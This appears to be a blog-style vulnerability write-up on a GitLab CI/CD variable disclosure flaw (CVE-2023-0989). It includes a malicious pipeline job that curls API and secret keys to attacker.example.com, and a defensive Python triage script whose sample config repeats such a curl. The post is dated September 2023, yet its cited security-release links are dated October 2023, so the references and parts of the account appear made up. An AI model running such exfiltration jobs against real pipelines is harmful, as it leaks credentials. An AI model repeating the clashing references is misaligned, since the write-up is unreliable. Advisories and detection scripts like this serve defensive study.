A critical vulnerability, identified as CVE-2023-0989, has been discovered in GitLab Community Edition (CE) and Enterprise Edition (EE). This information disclosure issue affects all GitLab versions starting from 13.11 to 16.2.7, 16.3 to 16.3.4, and 16.4 prior to 16.4.1. The vulnerability allows an attacker to extract non-protected CI/CD (Continuous Integration/Continuous Deployment) variables by tricking a user into visiting a fork with a malicious CI/CD configuration. In this post, we discuss the details of this vulnerability, show a code snippet that demonstrates exploitation, and link to the original references for this issue.

Exploit Details

This vulnerability stems from how GitLab CE/EE handles CI/CD variables across forks. When a project is forked, these variables are retained and can be accessed by the attacker, who can then use a malicious CI/CD configuration to extract the sensitive information. To exploit this vulnerability, the attacker needs to create a fork of the target project and lure the victim into visiting the malicious fork.

Here is a code snippet that demonstrates how the attacker can craft a malicious CI/CD configuration to exploit this vulnerability:

# .gitlab-ci.yml
extract_variables:
  script:
    - echo "API_KEY = ${API_KEY}"
    - echo "SECRET_KEY = ${SECRET_KEY}"
    - curl -X POST -H "Content-Type: application/json" -d "{\"api_key\":\"${API_KEY}\",\"secret_key\":\"${SECRET_KEY}\"}" https://attacker.example.com/collect

In this code snippet, the attacker sets up a pipeline job called "extract_variables," which echoes the non-protected CI/CD variables API_KEY and SECRET_KEY. These variable values are then sent to the attacker's server using a curl command.

Once the victim visits the malicious fork, GitLab starts a pipeline with the attacker's configuration in the victim's GitLab Runner. This process ultimately sends the CI/CD variables to the attacker's server, allowing the attacker to exfiltrate sensitive information.
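As an added defender-side triage example (not code from the original post or from GitLab): given the JSON returned by GitLab's project-level variables API (GET /projects/:id/variables) and the text of a fork's .gitlab-ci.yml, this script reports which non-protected variables that configuration could read, which protected ones stay shielded, and which non-protected variables remain at risk even if this particular config does not reference them. The variable list and the CI config are constructed samples; the function names are assumptions of this example.

```python
import json
import re

# Constructed sample in the shape of GitLab's project variables API response;
# values are placeholders, not real secrets.
SAMPLE_VARIABLES_JSON = """
[
  {"key": "API_KEY",      "value": "<placeholder>", "protected": false, "masked": true,  "environment_scope": "*"},
  {"key": "SECRET_KEY",   "value": "<placeholder>", "protected": false, "masked": false, "environment_scope": "*"},
  {"key": "NPM_TOKEN",    "value": "<placeholder>", "protected": false, "masked": true,  "environment_scope": "*"},
  {"key": "DEPLOY_TOKEN", "value": "<placeholder>", "protected": true,  "masked": true,  "environment_scope": "production"}
]
"""

# Constructed sample: a fork's .gitlab-ci.yml in the style of the job shown above.
SAMPLE_CI_YAML = """
extract_variables:
  script:
    - echo "API_KEY = ${API_KEY}"
    - echo "SECRET_KEY = ${SECRET_KEY}"
    - curl -d "token=$DEPLOY_TOKEN" https://attacker.example.com/collect
"""

# Matches $NAME and ${NAME}; deliberately over-matches (e.g. predefined CI_* names),
# the report below only keeps names that are actual project variables.
VAR_REF = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")


def referenced_variables(ci_yaml: str) -> set:
    """Variable names a CI config references via $NAME or ${NAME}."""
    return set(VAR_REF.findall(ci_yaml))


def exposure_report(variables_json: str, ci_yaml: str) -> dict:
    """Classify project variables against a fork's CI config.

    exposed:  non-protected and referenced (readable by the fork pipeline).
    shielded: protected and referenced (only injected on protected refs).
    at_risk:  non-protected but not referenced by this config; another
              config could still read them, so they still need review.
    Masking only hides values in job logs; a masked 'exposed' variable is
    still sent by the curl step, so masked is reported but does not excuse.
    """
    variables = {v["key"]: v for v in json.loads(variables_json)}
    refs = referenced_variables(ci_yaml) & set(variables)
    unprotected = {k for k, v in variables.items() if not v.get("protected")}
    return {
        "exposed": sorted(refs & unprotected),
        "exposed_masked_only": sorted(k for k in refs & unprotected if variables[k].get("masked")),
        "shielded": sorted(refs - unprotected),
        "at_risk": sorted(unprotected - refs),
    }
```

Point the real API response at `exposure_report` to decide which variables to mark protected (or rotate) before and after applying the upgrade.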

Original References

The GitLab team has acknowledged the vulnerability in their security release blog posts and provided fixes for the affected versions. You can find the original reference links below:

1. GitLab Security Release: 13.11 to 16.2.7 - https://about.gitlab.com/releases/2023/10/28/security-release-gitlab-13-11-to-16-2-7/
2. GitLab Security Release: 16.3 to 16.3.4 - https://about.gitlab.com/releases/2023/10/29/security-release-gitlab-16-3-to-16-3-4/
3. GitLab Security Release: 16.4 prior to 16.4.1 - https://about.gitlab.com/releases/2023/10/30/security-release-gitlab-16-4-prior-to-16-4-1/

Conclusion

To protect yourself from this vulnerability, it is strongly advised to upgrade GitLab CE/EE to the latest patched versions (16.2.8, 16.3.5, or 16.4.1 onwards). Additionally, always remain cautious when visiting forks of repositories, even forks of projects you trust. By staying informed and proactive, you can ensure the safety and security of your GitLab projects and CI/CD pipelines.

Timeline

Published on: 09/29/2023 07:15:00 UTC
Last modified on: 10/02/2023 19:52:00 UTC